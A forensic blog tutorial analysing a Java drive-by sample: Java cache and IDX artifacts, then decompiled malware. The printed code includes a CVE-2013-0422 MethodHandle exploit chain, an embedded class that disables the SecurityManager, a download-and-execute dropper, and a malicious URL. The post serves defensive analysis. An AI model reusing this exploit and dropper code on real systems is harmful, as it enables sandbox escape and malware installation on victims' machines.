DIY Java Malware Analysis

Parts Required: AndroChef ($) or JD-GUI (free), My Java IDX Parser (in Python), Malware Samples
Skill Level: Beginner to Intermediate
Time Required: Beginner (90 minutes), Intermediate (45 minutes), Advanced (15 minutes)

Java has once again been thrown into the limelight by another resurgence of Java-based drive-by malware attacks, reminiscent of the large-scale BlackHole exploit kit campaigns seen in early 2012. Through our cmdLabs commercial incident response and forensics team at Newberry Group, I've had the opportunity to perform numerous investigations into data breaches and financial losses caused by such malware.
Based on my own experience with Java-related infections, and after seeing some very lackluster reports produced by others, I've decided to write a simple how-to blog post on basic Java malware analysis from a forensic standpoint. Everyone has their own process; this is basically mine. It takes the approach of examining the initially downloaded files, seen as Java cached JAR and IDX files, examining the first-stage Java malware to determine its capabilities, and then looking for the second-stage infection.

Java Cached Files

One critical step in investigating any Java infection is to check for files within the Java cache folder. This folder stores a copy of each and every Java applet (JAR) downloaded, as well as a metadata file, the IDX file, that records when the file was downloaded and from where. These files are stored in the following standard locations:

Windows XP: %AppData%\Sun\Java\Deployment\Cache
Windows Vista/7/8: %UserProfile%\AppData\LocalLow\Sun\Java\Deployment\Cache

This folder contains numerous subdirectories, each corresponding to an instance of a downloaded file. By sorting the directory recursively by date and time, one can easily find the relevant files to examine. These files will be found auto-renamed to a random series of hexadecimal values, so don't expect to find "express.jar", or whatever file name the JAR was initially downloaded as.
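If you'd rather script the sort than click through Explorer, here is a minimal Java sketch of the same idea. It assumes you point it at a copy of the cache folder taken from the evidence (for example, the Vista/7/8 path above under the victim's profile) with timestamps preserved; the class name CacheLister is my own and not part of any tool. It walks every subdirectory and lists files newest first, so the IDX/JAR pairs written around the time of infection float to the top.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Comparator;
import java.util.List;
import java.util.stream.Collectors;
import java.util.stream.Stream;

// Hypothetical helper: lists every file under a Java cache folder, newest first.
class CacheLister {
    // Last-modified time in milliseconds; unreadable files get 0 so they sort last.
    static long lastModifiedMillis(Path path) {
        try {
            return Files.getLastModifiedTime(path).toMillis();
        } catch (IOException e) {
            return 0L;
        }
    }

    // Walks the tree recursively (the cache spreads files across many subdirectories)
    // and sorts regular files by modification time, most recent first.
    static List<Path> newestFirst(Path root) throws IOException {
        Comparator<Path> byTime = Comparator.comparingLong(CacheLister::lastModifiedMillis);
        try (Stream<Path> paths = Files.walk(root)) {
            return paths.filter(Files::isRegularFile)
                    .sorted(byTime.reversed())
                    .collect(Collectors.toList());
        }
    }

    public static void main(String[] args) throws IOException {
        if (args.length != 1) {
            System.err.println("usage: java CacheLister <path to Deployment\\Cache folder>");
            return;
        }
        for (Path path : newestFirst(Paths.get(args[0]))) {
            System.out.println(Files.getLastModifiedTime(path) + "  " + path);
        }
    }
}
```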

Java IDX Files

In my many investigations, I've always relied upon the Java IDX files to back up my assertions and provide critical indicators for the analysis. While I may know from the browser history that the user was browsing to a malicious landing page on XYZ.com, that doesn't mean the malware came from the same site. And, as Java malware is downloaded by a Java applet, there will likely be no corresponding history for the download in any web browser logs. Instead, we look to the IDX files to provide this information.

The Java IDX file is a binary-structured file, but one that is reasonably readable in a basic text editor. Nearly all of my analysis came from simply opening this file in Notepad++ and mentally parsing out the results. For an example of this in action, I recommend Corey Harrell's excellent blog post "(Almost) Cooked Up Some Java". This textual data is of great interest to an examiner, as it records when the file was downloaded from the remote site, what URL the file originated from, and what IP address the domain name resolved to at the time of the download.
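To get the same view as Notepad++ without wading through the binary noise, a strings-style pass over the file works well. The sketch below (IdxStrings is a hypothetical name) prints every run of four or more printable ASCII characters. Because the strings in the file are length-prefixed, expect an occasional stray leading character wherever a length byte happens to fall in the printable range.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.List;

// Hypothetical helper: a minimal "strings" utility for IDX files.
class IdxStrings {
    // Returns runs of at least minLength printable ASCII bytes (0x20-0x7E);
    // any other byte ends the current run.
    static List<String> printableRuns(byte[] data, int minLength) {
        List<String> runs = new ArrayList<>();
        StringBuilder current = new StringBuilder();
        for (byte b : data) {
            int c = b & 0xFF;
            if (c >= 0x20 && c <= 0x7E) {
                current.append((char) c);
            } else {
                if (current.length() >= minLength) {
                    runs.add(current.toString());
                }
                current.setLength(0);
            }
        }
        if (current.length() >= minLength) {
            runs.add(current.toString());
        }
        return runs;
    }

    public static void main(String[] args) throws IOException {
        if (args.length != 1) {
            System.err.println("usage: java IdxStrings <file.idx>");
            return;
        }
        for (String run : printableRuns(Files.readAllBytes(Paths.get(args[0])), 4)) {
            System.out.println(run);
        }
    }
}
```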

I was always able to retrieve the basic text information from the file, but the large blocks of binary data always bugged me. What data was I missing? Were there any other critical indicators in the file left undiscovered?

Java IDX Parser

At the time, no one had written a parser for the IDX file. Harrell's blog post above provided the basic text structure of the file for visual analysis, and a search led me to a Perl-based tool written by Sploit, described in "Java Forensics using TLN Timelines", that parsed the IDX file for indicators and output them into a forensic timeline file. However, none of these delved into the binary data. Facing a lifestyle change and a drastic home move, I found myself with a lot of extra time on my hands in January and February, so I decided to sit down and unravel this file. I wrote my initial IDX file parser, which only carved out the known text-based data, and placed it on GitHub to gauge interest.

On a side note, I had hoped for this to be a personal challenge to unwind with while moving. Upon posting my initial program, I packed away my PC and began moving to my new home. Two weeks later, after digging out and setting up, I found that the release had served as a catalyst for some awesome analysis. I applaud the great effort and documentation by Mark Woan and Joachim Metz.

In the weeks since the initial release, I have added numerous features and learned more about the file's structure. The file is composed of five distinct "sections", as named by Java:

Section 1 - Basic metadata on the status of the download. Was it completed successfully? What time was it completed at? How big is the IDX file?
Section 2 - Download data. This is the "text" section of the file and contains numerous length-prefixed strings situated in Field:Value pairs
Section 3 - Compressed copy of the JAR file's MANIFEST document
Section 4 - Code Signer information, in Java Serialization form
Section 5 - Additional data (I haven't yet found a file containing this)
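Section 2's length-prefixed strings can also be read programmatically rather than by eye. This is a minimal sketch, assuming each string is stored the way Java's own DataOutputStream.writeUTF() writes it (a two-byte big-endian length followed by modified UTF-8 bytes) and that you have already sliced out the section's bytes; neither the section offset nor the exact field order comes from this post, and IdxStringReader is a hypothetical name. The pairing helper further assumes every string in the slice belongs to a Field:Value pair. The demo builds a synthetic section in memory instead of reading a real IDX file.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

// Hypothetical helper: reads writeUTF-style strings from an already-extracted section.
class IdxStringReader {
    // Reads consecutive length-prefixed strings until the buffer is exhausted.
    static List<String> readUtfStrings(byte[] section) throws IOException {
        List<String> strings = new ArrayList<>();
        DataInputStream in = new DataInputStream(new ByteArrayInputStream(section));
        while (in.available() > 0) {
            strings.add(in.readUTF()); // throws EOFException on a truncated string
        }
        return strings;
    }

    // Pairs alternating field and value strings into "field: value" lines.
    static List<String> toFieldValueLines(List<String> strings) {
        List<String> lines = new ArrayList<>();
        for (int i = 0; i + 1 < strings.size(); i += 2) {
            lines.add(strings.get(i) + ": " + strings.get(i + 1));
        }
        return lines;
    }

    public static void main(String[] args) throws IOException {
        // Synthetic section built in memory, using values from the parser output in this post.
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        DataOutputStream out = new DataOutputStream(buffer);
        out.writeUTF("content-type");
        out.writeUTF("application/x-java-archive");
        out.writeUTF("server");
        out.writeUTF("nginx/1.0.15");
        out.flush();

        for (String line : toFieldValueLines(readUtfStrings(buffer.toByteArray()))) {
            System.out.println(line);
        }
    }
}
```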

It's somewhat difficult to measure the forensic value of the data recovered from sections 3 and 4. The manifest does show which version of Java the applet was compiled with, and for, but it is just a duplicate if the JAR is still present on the infected system. In the Java malware I've analyzed, Section 4 has typically provided scant detail, sometimes just the character "0" or a few null bytes. Instead of attempting to interpret this data, I simply display it on screen for posterity to unravel.
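Once Section 3 has been decompressed to text, the standard java.util.jar.Manifest class can parse it, which makes it easy to pull out the build details mentioned above. A minimal sketch, assuming you already have the manifest as a string (the decompression step is not shown, and ManifestInfo is a hypothetical name); the sample values are copied from the Section 3 output shown below.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.jar.Manifest;

// Hypothetical helper: extracts the Created-By attribute from manifest text.
class ManifestInfo {
    // Parses manifest text and returns the main-section Created-By value
    // (the JDK build that produced the JAR), or null if the attribute is absent.
    static String createdBy(String manifestText) throws IOException {
        Manifest manifest = new Manifest(
                new ByteArrayInputStream(manifestText.getBytes(StandardCharsets.UTF_8)));
        return manifest.getMainAttributes().getValue("Created-By");
    }

    public static void main(String[] args) throws IOException {
        // Each header line ends with CRLF because java.util.jar.Manifest
        // expects every line to be terminated.
        String text = "Manifest-Version: 1.0\r\n"
                + "Ant-Version: Apache Ant 1.8.3\r\n"
                + "Created-By: 1.7.0_07-b11 (Oracle Corporation)\r\n";
        System.out.println("Created-By: " + createdBy(text));
    }
}
```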

When run against the sample we're analyzing, my IDX Parser produces the following results:

E:\Development\Java_IDX_Parser>idx_parser.py e:\malware\java_XXX\1c20de82-1678cc50.idx
Java IDX Parser -- version 1.3 -- by @bbaskin
IDX file: e:\malware\java_XXX\1c20de82-1678cc50.idx (IDX File Version 6.05)

[*] Section 2 (Download History) found:
URL: http://80d3c146d3.gshjsewsf.su:82/forum/dare.php?hsh=6&key=b30a14e1c597bd7215d593d3f03bd1ab
IP: 50.7.219.70
<null>: HTTP/1.1 200 OK
content-length: 7162
last-modified: Mon, 26 Jul 2001 05:00:00 GMT
content-type: application/x-java-archive
date: Sun, 13 Jan 2013 16:22:01 GMT
server: nginx/1.0.15
deploy-request-content-type: application/x-java-archive


[*] Section 3 (Jar Manifest) found:
Manifest-Version: 1.0
Ant-Version: Apache Ant 1.8.3
X-COMMENT: Main-Class will be added automatically by build
Class-Path:
Created-By: 1.7.0_07-b11 (Oracle Corporation)


[*] Section 4 (Code Signer) found:
[*] Found: Data block.  Length: 4
Data:                   Hex: 00000000
[*] Found: Data block.  Length: 3
Data: 0                 Hex: 300d0a

Analysis of the infected file system showed browsing activity to a completely different web site, followed by a sudden infection. By timelining the events, I found the missing download information for the Java malware in the IDX file, pointing to a domain not found anywhere else on the system.
There are now a number of Java IDX parsers out there, many of which emerged quickly after I first published mine. Many provide a good starting point for extracting the obvious artifacts from the file, but I recommend trying them all to see which works best for you.

Java Malware Analysis

With the relevant Java malware file identified, I began analyzing it. Many examiners use a free decompiler like JD-GUI, which is a pretty useful tool for the cost. However, I've found in many cases that JD-GUI cannot properly decompile most of the file and ends up disassembling much of it instead. This means that the analysis is done not on clean Java code but on Java opcodes. This is certainly possible, and I gave a presentation to the Northern Virginia Hackers group last year on how to do it, but it's a lot of effort and tiresome. Instead, after a thorough evaluation of the tools currently available, I've switched to AndroChef for all of my analysis. It still misses some code, but it decompiles more than other tools can.

Before going in, note that VirusTotal reports this file as flagged by 2 of 46 engines for CVE-2013-0422. That gives us a clue about what exploit code to search for.

Using AndroChef on the malware file, I was able to retrieve the Java code, which was spread across five separate Class files. Each Class file is a separately compiled module, but data flows between them, so an examiner needs to analyze all of them together. For me, the easiest method is to copy and paste them all into one text document and edit it in Notepad++. This allows me to sweep-highlight a variable and quickly find every other location where that variable is used. After a cursory analysis, I try to determine, at a high level, the purpose of each class:

Allaon.class - Contains all of the strings used in the malware
Lizixk - Contains the dropper code
Morny - Contains the text decryption routines
Rvre - Contains an embedded Java class
Zend - Contains the main code
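If you prefer the command line to Notepad++ highlighting, the same cross-class search is easy to script. A minimal sketch (UsageFinder is a hypothetical name), assuming the decompiled classes have been saved as UTF-8 .java files: it prints every line, in every file, where an identifier appears as a whole word, so searching for Contex finds Allaon.Contex in the main code but skips a longer name such as Contexts.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

// Hypothetical helper: whole-word identifier search across decompiled sources.
class UsageFinder {
    // Returns "file:line: text" for each line containing identifier as a whole word.
    static List<String> findUsages(List<Path> sources, String identifier) throws IOException {
        Pattern word = Pattern.compile("\\b" + Pattern.quote(identifier) + "\\b");
        List<String> hits = new ArrayList<>();
        for (Path source : sources) {
            // Assumes the decompiler output is UTF-8 (plain ASCII also works).
            List<String> lines = Files.readAllLines(source, StandardCharsets.UTF_8);
            for (int i = 0; i < lines.size(); i++) {
                if (word.matcher(lines.get(i)).find()) {
                    hits.add(source.getFileName() + ":" + (i + 1) + ": " + lines.get(i).trim());
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) throws IOException {
        if (args.length < 2) {
            System.err.println("usage: java UsageFinder <identifier> <file.java>...");
            return;
        }
        List<Path> sources = new ArrayList<>();
        for (int i = 1; i < args.length; i++) {
            sources.add(Paths.get(args[i]));
        }
        for (String hit : findUsages(sources, args[0])) {
            System.out.println(hit);
        }
    }
}
```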

The JAR also contained the standard META-INF/MANIFEST.MF file, which matched the results shown by my IDX parser.

If you don't want to decode these files yourself, I have them available here for download.

The text within Allaon.class is obfuscated by inserting the text "Miria_)d" throughout each string, which a String.replace() call undoes at runtime, as shown below:

   public static String Gege = "fiesta".replace("Miria_)d", "");
   public static String Gigos = "sMiria_)dun.iMiria_)dnvoke.aMiria_)dnon.AMiria_)dnonMiria_)dymousClasMiria_)dsLoMiria_)dader".replace("Miria_)d", "");
   public static String Momoe = "f" + "ilMiria_)d///".replace("Miria_)d", "e:");
   public static String BRni = "j" + "avMiria_)da.io.tmMiria_)dpdiMiria_)dr".replace("Miria_)d", "");
   public static String Tte3 = "heMiria_)dhda.eMiria_)dxe".replace("Miria_)d", "");
   public static String Contex = "sun.orMiria_)dg.moziMiria_)dlla.javascMiria_)dript.inMiria_)dternal.ConMiria_)dtext".replace("Miria_)d", "");
   public static String ClsLoad = "sun.orMiria_)dg.mozMiria_)dilla.javasMiria_)dcript.inteMiria_)drnal.GeneraMiria_)dtedClaMiria_)dssLoader".replace("Miria_)d", "");
   public static String hack3 = "SophosHack";
   public static String Fcons = "fiMiria_)dndConstrMiria_)ductor".replace("Miria_)d", "");
   public static String Fvirt = "fiMiria_)dndVirtMiria_)dual".replace("Miria_)d", "");
   public static String hack2 = "SophosHack";
   public static String Crtcls = "creaMiria_)dteClasMiria_)dsLMiria_)doader".replace("Miria_)d", "");
   public static String DEfc = "defiMiria_)dneClaMiria_)dss".replace("Miria_)d", "");

By performing a simple find/replace, removing excess code, and globally giving the variables descriptive names, we get the following results:

   public static String FiestaTag = "fiesta";
   public static String InvokeAnonClassLoader = "sun.invoke.anon.AnonymousClassLoader";
   public static String FileURI = "file:///";
   public static String TempDir = "java.io.tmpdir";
   public static String s_hehda_exe = "hehda.exe";
   public static String MozillaJSContext = "sun.org.mozilla.javascript.internal.Context";
   public static String MozillaJSClassLoader = "sun.org.mozilla.javascript.internal.GeneratedClassLoader";
   public static String hack3 = "SophosHack";
   public static String s_findConstructor = "findConstructor";
   public static String s_findVirtual = "findVirtual";
   public static String hack2 = "SophosHack";
   public static String s_createClassLoader = "createClassLoader";
   public static String s_defineClass = "defineClass";
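The find/replace step can also be automated, so that every string literal followed by a .replace("junk", "x") call collapses into the string it produces at runtime. This is a regex-based sketch (ReplaceFolder is a hypothetical name), assuming the decompiler emits each call in exactly that shape; it does not join concatenations such as "f" + "ile:///" or unescape escape sequences, so a quick manual pass is still needed afterwards.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical helper: folds "literal".replace("a", "b") expressions in decompiled source.
class ReplaceFolder {
    // A double-quoted Java string literal; escaped characters are kept as-is, not unescaped.
    private static final String LITERAL = "\"((?:[^\"\\\\]|\\\\.)*)\"";
    private static final Pattern REPLACE_CALL = Pattern.compile(
            LITERAL + "\\.replace\\(" + LITERAL + ",\\s*" + LITERAL + "\\)");

    // Replaces each matched expression with a literal holding its runtime result.
    static String fold(String source) {
        Matcher m = REPLACE_CALL.matcher(source);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            String folded = m.group(1).replace(m.group(2), m.group(3));
            m.appendReplacement(out, Matcher.quoteReplacement("\"" + folded + "\""));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        String line = "public static String Fvirt = \"fiMiria_)dndVirtMiria_)dual\".replace(\"Miria_)d\", \"\");";
        System.out.println(fold(line)); // prints: public static String Fvirt = "findVirtual";
    }
}
```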

This provides a much better clue as to what is going on, especially as the author was fairly descriptive in naming his variables and didn't randomize them before deployment. I can then highlight each variable and find where else in the code that string is used. I then continue to find any such obfuscation throughout the code and remove it a bit at a time, condensing the code back to what was originally written.
By following the logic, and renaming variables (globally) when needed, we get a main code function that boils down to:

   public void init() {
      try {
         Rvre.sfgkytoi = this.getParameter("fiesta");
         byte[] Embedded_Java_Class = Rvre.Hex2Bin(Embedded_Java_Class_hex);
         
         JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
         JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", (MBeanServer)null, (MBeanServerDelegate)null);
         MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
         Object a = null;
         Class localClass1 = localMBeanInstantiator.findClass(Allaon.Contex, (ClassLoader)a);
         Class localClass2 = localMBeanInstantiator.findClass(Allaon.ClsLoad, (ClassLoader)a);
         Lookup lolluk = MethodHandles.publicLookup();
         MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{MethodType.class});
         MethodHandle localMethodHandle1 = lolluk.findVirtual(Lookup.class, Allaon.Fcons, localMethodType1);
         MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
         MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[]{lolluk, localClass1, localMethodType2});
         Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
         MethodType ldmet3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{String.class, MethodType.class});
         MethodHandle localMethodHandle3 = lolluk.findVirtual(Lookup.class, "findVirtual", ldmet3);
         MethodType ldmet4 = MethodType.methodType(localClass2, ClassLoader.class);
         MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass1, "createClassLoader", ldmet4});
         Object lObj2 = localMethodHandle4.invokeWithArguments(new Object[]{localObject1, null});
         MethodType ldmet5 = MethodType.methodType(Class.class, String.class, new Class[]{byte[].class});
         MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass2, "defineClass", ldmet5});
         
         Class lca3 = (Class)localMethodHandle5.invokeWithArguments(new Object[]{lObj2, null, Embedded_Java_Class});
         lca3.newInstance();
         Lizixk.DropFile_Exec();
      } catch (Throwable var22) {
         ;
      }
   }

Much of this is straightforward. However, there is a very large block of "MethodType" and "MethodHandle" calls that make up the exploit for CVE-2013-0422. More on this exploit can be found on Microsoft's TechNet site. The actual runtime magic appears as a single function call to the Lizixk class, which contains a function to decode a URL, download an executable from it, drop it to %Temp%, and run it. But how can such malicious logic work? A look at the top of this same function shows us the actual exploit that makes it happen. This function contains a long, obfuscated string value that has the phrase "mMoedl" throughout it, similar to the encoding used by the strings in Allaon. Upon removing this excess text, we can clearly see that the first eight hex characters (four bytes) are "CAFEBABE":

public static String Ciasio = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017"

CAFEBABE is the magic value, in hex, for compiled Java class files. That tells us what we're looking at, and that the string needs to be converted from hex back to binary and saved to a file. Doing so produces another class file, which AndroChef decompiles into the following code:

import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B implements PrivilegedExceptionAction {
   public B() {
      try {
         AccessController.doPrivileged(this);
      } catch (Exception var2) {
         ;
      }
   }
   public Object run() {
      System.setSecurityManager((SecurityManager)null);
      return new Object();
   }
}

Wow! Such simple code, yet a few items are glaring. First off, VirusTotal flagged this file as 1/46 for Java/Dldr.Pesur.AN. More importantly, the code simply calls System.setSecurityManager(null) inside AccessController.doPrivileged(), disabling the security manager that enforces the Java sandbox and giving the parent code the ability to drop and execute the second-stage malware.
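The hex-to-binary step used to recover class B takes only a few lines. A minimal sketch (HexToClass is a hypothetical name), assuming just the hex characters of the Ciasio string have been saved to a text file: it strips the "mMoedl" junk, converts each pair of hex digits to a byte, confirms the CAFEBABE magic, and reports the class-file major version before writing the .class file for the decompiler. For the string above, the version bytes 0x0032 work out to 50, i.e. a Java 6 class file.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;

// Hypothetical helper: turns an embedded hex string back into a .class file.
class HexToClass {
    // Strips the junk marker, then converts each pair of hex digits into one byte.
    static byte[] hexToBytes(String obfuscatedHex, String junk) {
        String hex = obfuscatedHex.replace(junk, "");
        if (hex.length() % 2 != 0) {
            throw new IllegalArgumentException("odd number of hex digits");
        }
        byte[] out = new byte[hex.length() / 2];
        for (int i = 0; i < out.length; i++) {
            int high = Character.digit(hex.charAt(2 * i), 16);
            int low = Character.digit(hex.charAt(2 * i + 1), 16);
            if (high < 0 || low < 0) {
                throw new IllegalArgumentException("non-hex character near offset " + (2 * i));
            }
            out[i] = (byte) ((high << 4) | low);
        }
        return out;
    }

    // True if the data holds at least the 8-byte class-file header starting with 0xCAFEBABE.
    static boolean isClassFile(byte[] data) {
        return data.length >= 8
                && (data[0] & 0xFF) == 0xCA && (data[1] & 0xFF) == 0xFE
                && (data[2] & 0xFF) == 0xBA && (data[3] & 0xFF) == 0xBE;
    }

    // Major version is the big-endian unsigned 16-bit value at offset 6 (50 = Java 6, 51 = Java 7).
    static int majorVersion(byte[] data) {
        return ((data[6] & 0xFF) << 8) | (data[7] & 0xFF);
    }

    public static void main(String[] args) throws IOException {
        if (args.length != 2) {
            System.err.println("usage: java HexToClass <hex.txt> <output.class>");
            return;
        }
        String text = new String(Files.readAllBytes(Paths.get(args[0])), StandardCharsets.US_ASCII).trim();
        byte[] data = hexToBytes(text, "mMoedl");
        if (!isClassFile(data)) {
            System.err.println("no CAFEBABE header; check the junk marker");
            return;
        }
        System.out.println("class file major version: " + majorVersion(data));
        Files.write(Paths.get(args[1]), data);
    }
}
```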

With everything analyzed, we return to the function call to Class Lizixk that drops the malware. Now that the exploit has launched and the sandbox is disabled, this dropper routine runs:

public class Lizixk {
   public static String TempDir = getProperty("java.io.tmpdir");
   static InputStream filehandle;
   public static void DropFile_Exec() throws FileNotFoundException, Exception {
      if(TempDir.charAt(TempDir.length() - 1) != "\\") {
         TempDir = TempDir + "\\";
      }
      String Hehda_exe = TempDir + "hehda.exe";
      FileOutputStream output_filehandle = new FileOutputStream(Hehda_exe);
      DownloadEXE();
      int data_size;
      for(byte[] rayys = new byte[512]; (data_size = filehandle.read(rayys)) > 0; rayys = new byte[512]) {
         output_filehandle.write(rayys, 0, data_size);
      }
      output_filehandle.close();
      filehandle.close();
      Runtime.getRuntime().exec(Hehda_exe);
   }
   public static void DownloadEXE() throws IOException {
      URL fweret = new URL(Morny.data_decode(fiesta));
      fweret.openConnection();
      filehandle = fweret.openStream();
   }
}

There are two routines in play here, which I renamed: DropFile_Exec() and DownloadEXE(). The first is called by Class Zend and is responsible for determining the temporary folder (%Temp%) and creating a file named "hehda.exe". It then calls DownloadEXE(). This latter routine retrieves the value of the "fiesta" applet parameter embedded in the HTML, decodes it with a custom routine to recover a URL, and opens a stream to that file, which DropFile_Exec() then writes to "hehda.exe".

After this, the file is run and the second stage begins. This is standard operating procedure, as the second stage typically belongs to the operator who purchased the exploit kit and wants their malware installed. They only need the first stage (BlackHole) to get it running on the system.

Custom Data Encoding

I have a deep love for custom encoding and encryption routines, so even without the raw data, I analyzed the encoding for the URL, found in Class Morny:

   public static String data_decode(String web_data) {
      int byte_pos = 0;
      web_data = (new StringBuffer(web_data)).reverse().toString();
      String decoded_data = "";
      web_data = web_data.replace("a-nytios", "");
      for(int i = 0; i < web_data.length(); ++i) {
         ++byte_pos;
         if(byte_pos == 3) {
            decoded_data = decoded_data + web_data.charAt(i);
            byte_pos = 0;
         }
      }
      return decoded_data;
   }

There are several small steps going on here. The encoded data is retrieved from the web site's HTML and then reversed. Next, all instances of the text "a-nytios" are removed, just as the Java code did with its embedded strings. Finally, the routine keeps every third character of the data and discards the rest. For example:

Encoded: z1eZmxsoityn-a7aeeF.pxlhsiTxvR7ejI/H4soityn-amuto6IceE.yre9EtcNii7scKdtsoityn-aJazybPT.ZSwFqsoityn-awNSwPd/p8/Mu:YVpsoityn-aEQtRrtH4soityn-ahgR
Reversed: Rgha-nytios4HtrRtQEa-nytiospVY:uM/8p/dPwSNwa-nytiosqFwSZ.TPbyzaJa-nytiostdKcs7iiNctE9ery.EecI6otuma-nytios4H/Ije7RvxTishlxp.Feea7a-nytiosxmZe1z

Phrase-removed: Rgh4HtrRtQEpVY:uM/8p/dPwSNwqFwSZ.TPbyzaJtdKcs7iiNctE9ery.EecI6otum4H/Ije7RvxTishlxp.Feea7xmZe1z

Every third byte: http://www.badsite.com/evil.exe

One reason I call this out is that there's little reporting on the routine, even though it's common across multiple variants of BlackHole/Redkit/fiesta/etc. You understand it better by reading through the code (and recreating it in Python/Perl) than by guessing your way through it (see "llobapop" ;))
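In that spirit, here is a small analyst-side Java re-implementation of Morny.data_decode(). It is a sketch, not the malware's code: FiestaUrlDecoder is a hypothetical name, and I've made the junk marker and the character step parameters on the assumption that other variants may change them. The demo reproduces the worked example above.

```java
// Hypothetical analyst-side re-implementation of Morny.data_decode(); not the malware's code.
class FiestaUrlDecoder {
    // Reverses the input, strips every occurrence of the junk marker, then keeps every
    // step-th character (the 3rd, 6th, 9th, ... when step is 3), discarding the rest.
    static String decode(String encoded, String junk, int step) {
        if (step < 1) {
            throw new IllegalArgumentException("step must be at least 1");
        }
        String cleaned = new StringBuilder(encoded).reverse().toString().replace(junk, "");
        StringBuilder decoded = new StringBuilder();
        for (int i = step - 1; i < cleaned.length(); i += step) {
            decoded.append(cleaned.charAt(i));
        }
        return decoded.toString();
    }

    public static void main(String[] args) {
        // The encoded sample from the worked example above.
        String encoded = "z1eZmxsoityn-a7aeeF.pxlhsiTxvR7ejI/H4soityn-amuto6IceE.yre9EtcNii7scKd"
                + "tsoityn-aJazybPT.ZSwFqsoityn-awNSwPd/p8/Mu:YVpsoityn-aEQtRrtH4soityn-ahgR";
        System.out.println(decode(encoded, "a-nytios", 3)); // prints http://www.badsite.com/evil.exe
    }
}
```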

Second-Stage Malware Analysis

The end result of this Java malware is to place a single executable onto your system and run it. The malware doesn't even know where that executable comes from; it relies on an external source (the "fiesta" parameter) to tell it where to download it from. This is how we separate the various stages of an infection: the Java first stage is the Trojan horse that breaches the walls, while hehda.exe is the Greek army hidden within.
Through the investigation, we found that the second-stage malware was a variant of the ZeroAccess rootkit, a pretty nasty piece of work. However, this post has grown long, so I will leave analysis of that file for the next one. We will reconvene to discuss ZeroAccess, how it entrenches itself onto the system, how IDA Pro likes to puke on it, and how undocumented Windows API calls give it so much power over your computer.

Ghetto Forensics

12 January 2013

Java Malware - Identification and Analysis